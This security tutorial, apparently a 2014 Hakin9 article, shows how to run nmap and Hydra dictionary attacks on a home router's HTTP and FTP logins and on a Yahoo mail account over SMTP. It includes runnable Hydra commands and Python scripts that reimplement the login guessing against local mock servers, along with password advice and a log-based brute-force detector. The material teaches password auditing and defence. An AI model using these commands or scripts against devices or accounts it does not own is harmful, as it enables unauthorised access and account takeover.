Using Hydra To Crack The Door Open



by Nikolaos Mitropoulos


Take advantage of a cracking tool to test the resilience of your local or remote network servers and of various other devices on the network, from a computer to a router.

Security measures range from the basic controls of ordinary computing systems to intricate industrial systems with biometric locks, and, in the future, to the challenges that quantum computing will bring.

The more important the data is, the tighter the locks must be. The countermeasures can range from simple to elaborate as we climb the ladder of importance of the information to be protected, but a chain is only as strong as its weakest link.


Figure 1. Base memory size used in VirtualBox installation

If the administrator's password is not secure enough, an attacker may use it to escalate privileges and reach the data, defeating every other control that stands between that data and the myriad attackers who seek direct access to it. If the front door is heavily fortified, most malicious actors will move on to the next building to try their luck. Hence the strength of the passwords on your local network, on your network devices and on your remote servers is a critical step in preventing attacks. Some basic password creation rules:

A minimum password length of 12 to 18 characters.

Include numbers, upper and lower case combinations as well as symbols, if the system allows it.

Avoid names or important personal information that someone else also knows, e.g. your father’s name or your date of birth.

Use a password generator (where feasible).

Store them in a password manager protected by a master password, not on post-it notes or handwritten lists hidden at your desk.

Change any default passwords.

Make intentional typos that only you know.

Do not use the same password for all your systems.

Change a password whenever you have reason to believe it has been exposed. Forced periodic rotation is no longer recommended (see NIST SP 800-63B), because it pushes users towards predictable variations of the old password, which is exactly what dictionary attacks exploit.

So, now you know the rules. But how do you ensure that your passwords are strong enough, yet not too complicated to remember? How can you evaluate the strength of a password? You can use the tools in BackTrack to test your passwords' resilience.
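The following Python script is an added example (it is not part of the original article) that puts the rules above into practice: it checks a candidate password against the formal rules and, more importantly, against the set of passwords that a dictionary attack with a few common mangling rules would reach. The wordlist and the mangling rules are constructed for illustration and stand in for a real attacker's far larger dictionary.

```python
"""Added example: is this password reachable by a dictionary attack?

The wordlist and mangling rules below are constructed for illustration."""
import itertools
import string

# Constructed, deliberately tiny wordlist standing in for dictionary.txt.
BASE_WORDS = ["password", "admin", "backtrack", "letmein", "router"]

# Mangling rules of the kind John the Ripper / Hashcat rule files apply.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = [""] + [str(n) for n in range(100)] + ["!", "123", "2014"]


def mangle(word):
    """Yield the variants of one word that common cracking rules produce."""
    forms = {word, word.lower(), word.upper(), word.capitalize(), word.translate(LEET)}
    for form, suffix in itertools.product(sorted(forms), SUFFIXES):
        yield form + suffix


def candidate_space(words=BASE_WORDS):
    """Every password reachable from the wordlist with these rules."""
    return {candidate for word in words for candidate in mangle(word)}


def policy_violations(pw):
    """Return the article's formal rules that pw breaks (empty tuple = passes)."""
    problems = []
    if len(pw) < 12:
        problems.append("shorter than 12 characters")
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation)
    if sum(any(ch in cls for ch in pw) for cls in classes) < 3:
        problems.append("fewer than three character classes")
    return tuple(problems)


def assess(pw, words=BASE_WORDS):
    """Policy check plus dictionary check.

    A password can satisfy every formal rule and still fall in seconds
    if it is merely a mangled dictionary word."""
    space = candidate_space(words)
    return {
        "violations": policy_violations(pw),
        "in_dictionary_space": pw in space,
        "space_size": len(space),
    }


if __name__ == "__main__":
    for pw in ["admin", "Backtrack2014", "zQ!7mv9p#Lr2"]:
        print(f"{pw!r}: {assess(pw)}")
```

Note that "Backtrack2014" passes every formal rule (13 characters, three character classes) and is still one of only about two thousand candidates a five-word list produces, so Hydra would find it in its first few seconds.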


Figure 2. Hard disk size used in VirtualBox installation

Installing Backtrack on VirtualBox

There are three ways to run BackTrack:

Install it on your computer.

Run it from a live CD.

Install it in a virtual environment such as VirtualBox or VMware.

I am going to demonstrate how to install BackTrack in VirtualBox. To do this, you need to download two components:

the latest VirtualBox version (https://www.virtualbox.org/wiki/Downloads)

the BackTrack image for VirtualBox (https://www.backtrack-linux.org/downloads/). Note that BackTrack has since been discontinued in favour of Kali Linux (https://www.kali.org/), which ships the same tools, nmap and Hydra included; the steps below apply to it unchanged.

Once you have both, create the virtual machine in VirtualBox. Keep two things in mind: allocate generous memory and disk space during creation, as shown in the two screenshots above (Figures 1 and 2). I use at least 1024 MB of memory and a hard disk larger than 10 GB. All other settings can be left at their defaults. Attach the BackTrack .iso to this VirtualBox instance and boot it to run the installation. One last thing: be patient during the final phase, as the progress bar may appear to stall at 99%. Do not abort, and you will eventually see the message in Figure 3.


Figure 3. Installation completion message from Backtrack

The password tools in BackTrack are located under Backtrack → Privilege Escalation → Password Attacks, as you can see in Figure 4.


Figure 4. Backtrack password cracking tools

In our next example we will use nmap, which is also included in BackTrack and is an open-source tool for network discovery and security auditing. Since this article does not intend to demonstrate nmap usage, I will only mention that its most famous feature is port scanning. Given the IP address of any device on the network, a computer or a router, nmap tells you which ports are open on it. My router sits on the local network at 192.168.1.1, and I want to scan it to see which services are exposed, so I run the command: nmap 192.168.1.1. As you can see in Figure 5, my device has TCP ports 21, 23, 53, 80 and 5555 open. In this default mode nmap scans the 1,000 most common TCP ports, not all 65,535; add -p- to scan them all and -sV to identify the service and version behind each open port, which also tells you which Hydra module to use against it.


Figure 5. Using nmap to perform port scanning at 192.168.1.1 (router’s IP)

I will now introduce Hydra, a well-known tool for dictionary attacks against the login of network services on all sorts of devices (you can find it in the Online Attacks sub-path of the BackTrack menu mentioned above). Alternatively, if you are using Windows, you can install Cygwin and run the tools from there. In this example I will use Hydra to perform a dictionary attack on my router's password. I will use a file, dictionary.txt, which I keep populating with more words as time goes by; for this demonstration I have trimmed it to 30 passwords. The parameters that Hydra accepts are shown in Listing 1.

Listing 1. Hydra parameters of operation

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
  -R                   restore a previous aborted/crashed session
  -S                   perform an SSL connect
  -s PORT              if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET   password bruteforce generation, type "-x -h" to get help
  -e nsr               try "n" null password, "s" login as pass and/or "r" reversed login
  -u                   loop around users, not passwords (effective! implied with -x)
  -C FILE              colon separated "login:pass" format, instead of -L/-P options
  -M FILE              server list for parallel attacks, one entry per line
  -o FILE              write found login/password pairs to FILE instead of stdout
  -f                   exit after the first found login/password pair (per host if -M)
  -t TASKS             run TASKS number of connects in parallel (default: 16)
  -w / -W TIME         waittime for responses (32s) / between connects per thread
  -4 / -6              prefer IPv4 (default) or IPv6 addresses
  -v / -V              verbose mode / show login+pass combination for each attempt
  -U                   service module usage details
  server               the target server (use either this OR the -M option)
  service              the service to crack. Supported protocols: cisco cisco-enable
                       cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
                       http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql
                       ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp
                       rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak
                       telnet vmauthd vnc xmpp

The command used to attack the router, along with its arguments, is as follows:

hydra -V -l admin -P /root/Desktop/dictionary.txt -t 36 -f -s 80 192.168.1.1 http-get /

So we are essentially telling Hydra to show every username and password combination as it is tried (-V), to use the single username admin (-l; the default on most routers, although a file of usernames can be supplied with -L instead), to take the passwords from the given file (-P), to run 36 connections in parallel (-t), to exit after the first successful login (-f) and to connect to port 80 (-s), the HTTP port that nmap showed to be open. Then come the router's IP address, 192.168.1.1, and the module, http-get (HTTP Basic authentication over a GET request; HTML login forms need http-post-form instead). Notice the / at the end of the line: it is the path to request, here the root page, so each login/password pair is sent in an Authorization header to http://192.168.1.1/. Hydra treats a 401 reply as a failed guess and a 2xx or 3xx reply as a valid pair, so make sure the path you choose really requires authentication; otherwise every attempt will look successful. Also, 36 parallel connections is a lot for the embedded web server of a home router; if the run stalls or reports odd results, lower -t (4 is a safe start). The output we get is shown in Figure 6.


Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1

As you can see, the password search was not successful, so the program simply finishes. As stated earlier, keep one basic principle in mind: the larger and more varied the dictionary, the better the result. Let us try a different approach and attack the router's FTP service with the command that follows. This time, in addition to the wordlist, we tell Hydra to try a null password (-e n) and the login name as the password (-e s), two of the most common defaults.

hydra -V -l admin -P /root/Desktop/dictionary.txt -e ns -f -s 21 192.168.1.1 ftp
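To make concrete what the two commands above do on the wire, here is an added example (not from the original article, and not Hydra's own code) that reimplements the logic of the http-get module in Python against a throw-away HTTP server started in the same process, so it runs offline. The server, the admin credentials and the wordlist are all constructed; the -e ns handling mirrors the option used in the FTP command. Note the success rule: in this reimplementation a guess counts as a hit whenever the response is anything other than 401, which is also why pointing Hydra at a page that does not require authentication makes every guess look correct.

```python
"""Added example: what `hydra -l admin -P FILE -e ns -f -s PORT HOST http-get /`
does, against a constructed local target so it can run offline."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: a router-like admin page protected by HTTP Basic auth.
VALID_USER, VALID_PASS = "admin", "enti4752"
WORDLIST = ["password", "12345678", "router", "enti4752", "letmein"]  # stands in for dictionary.txt


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Answers 200 for the right Basic credentials, 401 for anything else."""

    def do_GET(self):
        expected = base64.b64encode(f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization") == "Basic " + expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_server():
    """Bind the constructed target on a free localhost port."""
    srv = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(host, port, path, user, password):
    """One attempt, as the http-get module sends it: GET path with a Basic
    Authorization header. Anything other than a 401 is taken as success."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn.request("GET", path, headers={"Authorization": "Basic " + token})
    status = conn.getresponse().status
    conn.close()
    return status != 401


def dictionary_attack(host, port, path, user, wordlist, extra="ns", stop_on_first=True):
    """Sequential equivalent of the hydra run (the real tool uses -t parallel tasks).

    -e n tries the empty password and -e s the login name as password; Hydra
    tries these before the wordlist, and -f stops at the first hit."""
    candidates = []
    if "n" in extra:
        candidates.append("")
    if "s" in extra:
        candidates.append(user)
    candidates += wordlist
    hits, attempts = [], 0
    for pw in candidates:
        attempts += 1
        if try_login(host, port, path, user, pw):
            hits.append((user, pw))
            if stop_on_first:
                break
    return {"hits": hits, "attempts": attempts}


if __name__ == "__main__":
    server = start_server()
    port = server.server_address[1]
    print(dictionary_attack("127.0.0.1", port, "/", "admin", WORDLIST))
    server.shutdown()
```

The script tries the empty password and "admin" first, then the wordlist, and stops at the sixth attempt with admin/enti4752. The real tool runs its attempts in parallel, which is where the -t value matters: a consumer router may accept only a handful of simultaneous connections and start dropping or delaying the rest.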

If you are not a command-line addict, you can use the GUI version of Hydra (xhydra). Setting the parameters as in Figure 7 and Figure 8 reproduces the same settings as the command line above.


Figure 7. Hydra settings in target tab


Figure 8. Hydra settings in passwords tab

If you want to change the number of tasks, use the Tuning tab; once everything is set, go to the Start tab and launch the attack. Afterwards you can save the output for later inspection. For example, my test produced output whose final two lines state:

[ATTEMPT] target 192.168.1.1 - login "admin" - pass "enti4752"

[21][ftp] host: 192.168.1.1   login: admin   password: enti4752

To verify that this is indeed correct, I connect via FTP to 192.168.1.1 using "admin" as the username and "enti4752" as the password.


Figure 9. Connecting through ftp to 192.168.1.1
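What the attacks above look like from the target's side, as an added example that is not part of the original article: each Hydra guess against the router's web interface produces a 401 in the access log, a fraction of a second after the previous one. The script below, run over constructed access-log lines in the common Apache/nginx format, flags any client that produces a burst of 401s and notes whether a 200 followed the burst, the signature of a guess that succeeded.

```python
"""Added example: spotting a Hydra-style HTTP Basic-auth burst in an access log.

The log lines are constructed for illustration (combined log format)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a Hydra-like burst from 192.168.1.50 amid normal traffic.
SAMPLE_LOG = """\
192.168.1.20 - - [02/Sep/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 512
192.168.1.50 - admin [02/Sep/2014:10:00:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [02/Sep/2014:10:00:02 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [02/Sep/2014:10:00:03 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [02/Sep/2014:10:00:03 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [02/Sep/2014:10:00:04 +0000] "GET / HTTP/1.0" 401 0
192.168.1.50 - admin [02/Sep/2014:10:00:04 +0000] "GET / HTTP/1.0" 200 4096
192.168.1.20 - - [02/Sep/2014:10:00:09 +0000] "GET /status HTTP/1.1" 401 0
192.168.1.20 - - [02/Sep/2014:10:05:00 +0000] "GET /status HTTP/1.1" 401 0
""".splitlines()


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=30)):
    """Alert on any client with >= threshold 401s inside `window`.

    Each alert also records whether that client got a 200 within `window`
    after the burst, which is what a successful guess looks like."""
    failures, successes = defaultdict(list), defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec["status"] == 401:
            failures[rec["ip"]].append(rec["ts"])
        elif rec["status"] == 200:
            successes[rec["ip"]].append(rec["ts"])

    alerts = []
    for ip, times in failures.items():
        times.sort()
        start = 0                       # sliding window over sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                followed = any(burst_end <= t <= burst_end + window for t in successes[ip])
                alerts.append({"ip": ip, "failures": end - start + 1,
                               "first": times[start], "last": burst_end,
                               "success_after_burst": followed})
                break                   # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The two isolated 401s from 192.168.1.20, five minutes apart, are ordinary user error and stay below the threshold; the five from 192.168.1.50 inside three seconds, followed by a 200, are the attack. The same windowing works on an FTP daemon's or sshd's failed-login lines with a different regular expression.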

Let's see one more example of using Hydra, this time to crack a Yahoo Mail account (the same logic applies to Gmail, Hotmail or any other provider that exposes SMTP authentication). We use the following settings:

Single target: smtp.mail.yahoo.com (Yahoo's SMTP server)

Protocol: smtp

Port: 465

Also enable: SSL, verbose output and show attempts.

The username we specify is the mail account we are attempting to crack, so in my example I put my own account, together with the same dictionary I have been using throughout this article (Figure 10 and Figure 11). Only do this against an account you own: the attempts travel over the Internet to the provider's server, where failed logins are logged and throttled, and the account may be locked after a handful of them, which also limits how far a dictionary attack can get.


Figure 10. Hydra Target tab settings for cracking yahoo passwords


Figure 11. Hydra Passwords tab settings for cracking yahoo passwords

If we now start Hydra, we get output like that in Figure 12. I have shortened the dictionary to limit the execution time and the length of the output, so as to focus on the result.


Figure 12. Attacking yahoo mail account and revealing the password

An additional line at the end states:

[25][smtp] host: 188.125.69.59   login: [email protected]   password: backtrack

Using the above credentials, I can log in to my mail account through the standard web page at https://login.yahoo.com/.
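The protocol exchange behind the smtp module, as an added example (not part of the original article and not Hydra's own code): Hydra authenticates like an ordinary mail client, sending EHLO and then AUTH PLAIN (or AUTH LOGIN) and reading the reply code, 235 for success and 535 for failure. To keep this offline and away from any real provider, the script below runs a minimal SMTP server in a thread and attacks it with a constructed account, password and wordlist; the transcript it returns shows both sides' messages. On a real submission port such as 465 the same exchange runs inside TLS (Hydra's -S; in Python, ssl.SSLContext.wrap_socket or smtplib.SMTP_SSL).

```python
"""Added example: the SMTP AUTH PLAIN exchange a dictionary attack drives,
against a constructed local server so nothing leaves the machine."""
import base64
import socket
import socketserver
import threading

# Constructed target account and the password the mock server accepts.
ACCOUNT, REAL_PASSWORD = "user@example.com", "backtrack"
WORDLIST = ["password", "yahoo2014", "backtrack", "qwerty"]  # stands in for dictionary.txt


class MockSMTPHandler(socketserver.StreamRequestHandler):
    """Minimal SMTP server: EHLO/HELO, AUTH PLAIN and QUIT, nothing else."""

    def reply(self, text):
        self.wfile.write((text + "\r\n").encode())

    def handle(self):
        self.reply("220 mock.example.com ESMTP")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return                              # client went away
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd in ("EHLO", "HELO"):
                self.reply("250-mock.example.com")
                self.reply("250 AUTH PLAIN")        # advertise the mechanism
            elif cmd == "AUTH" and arg.upper().startswith("PLAIN "):
                # RFC 4616: base64("authzid\0authcid\0password")
                parts = base64.b64decode(arg.split(" ", 1)[1]).split(b"\0")
                ok = len(parts) == 3 and parts[1:] == [ACCOUNT.encode(), REAL_PASSWORD.encode()]
                self.reply("235 2.7.0 Authentication successful" if ok
                           else "535 5.7.8 Authentication credentials invalid")
            elif cmd == "QUIT":
                self.reply("221 Bye")
                return
            else:
                self.reply("502 Command not implemented")


def _read_reply(rfile):
    """Read one (possibly multi-line) SMTP reply; return (code, lines)."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode().rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":         # "250-" continues, "250 " ends
            return int(line[:3]), lines


def smtp_auth_attempt(host, port, user, password, transcript):
    """One AUTH PLAIN attempt; both sides' lines are appended to transcript.
    True only on a 235 reply, the same rule Hydra's smtp module applies."""
    with socket.create_connection((host, port), timeout=5) as sock:
        rfile = sock.makefile("rb")

        def send(cmd):
            transcript.append("C: " + cmd)
            sock.sendall((cmd + "\r\n").encode())

        def recv():
            code, lines = _read_reply(rfile)
            transcript.extend("S: " + line for line in lines)
            return code

        recv()                                      # 220 greeting
        send("EHLO client.example")
        recv()                                      # 250 ... AUTH PLAIN
        token = base64.b64encode(b"\0" + user.encode() + b"\0" + password.encode()).decode()
        send("AUTH PLAIN " + token)
        code = recv()                               # 235 or 535
        send("QUIT")
        recv()
        return code == 235


def smtp_dictionary_attack(host, port, user, wordlist):
    """Sequential equivalent of: hydra -l USER -P FILE -s PORT -f HOST smtp
    Returns (password or None, transcript)."""
    transcript = []
    for pw in wordlist:
        if smtp_auth_attempt(host, port, user, pw, transcript):
            return pw, transcript
    return None, transcript


def start_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), MockSMTPHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_server()
    found, log = smtp_dictionary_attack("127.0.0.1", srv.server_address[1], ACCOUNT, WORDLIST)
    print("\n".join(log))
    print("password found:", found)
    srv.shutdown()
```

Each wrong guess costs a full TCP connection and a round trip for every line of the exchange, which is why online attacks are slow compared with offline hash cracking, and why a provider can stop them simply by delaying or refusing connections after a few 535 replies.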

Summary

The above article shows how easy it is to target a system that is protected by a weak password. We used nmap as a network scanner, then the protocol modules and options of Hydra.

As stated throughout this article, dictionary attacks are only as strong as the dictionary behind them, combined with the processing power available to extend that dictionary with brute-force generation. Note that Hydra is an online tool: every guess is a real login attempt against a live service, so it is bounded by network latency, the target's connection limits and any account lockout, and every attempt leaves a trace in the target's logs. BackTrack also contains many other online and offline password-cracking tools, such as RainbowCrack, John the Ripper, Medusa and Ncrack, which are worth dissecting in other articles.

For instance, John the Ripper cracks password hashes offline: given the hashed contents of a password file, it hashes candidate words and compares them until the plaintext is found, limited only by your own hardware rather than by the target's response time. You will be amazed how many people still use default passwords or simple words as passwords.

Never underestimate how simple-minded users or system administrators can be. You may remember the old movie "Hackers," in which the most commonly used passwords are said to be "love," "secret," "sex" and "God." You wouldn't believe how many people still use these words as their passwords.

About the Author

Nikolaos Mitropoulos has been working for over a year as a network security engineer in AT&T's Managed Security Services team. He is Cisco and Juniper certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years he has focused on teaching at various levels, from secondary education courses to demanding corporate classes for professionals dealing with multiple aspects of networking and security. His hobbies are steganography, digital watermarking and building penetration testing skills.

September 2, 2014
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023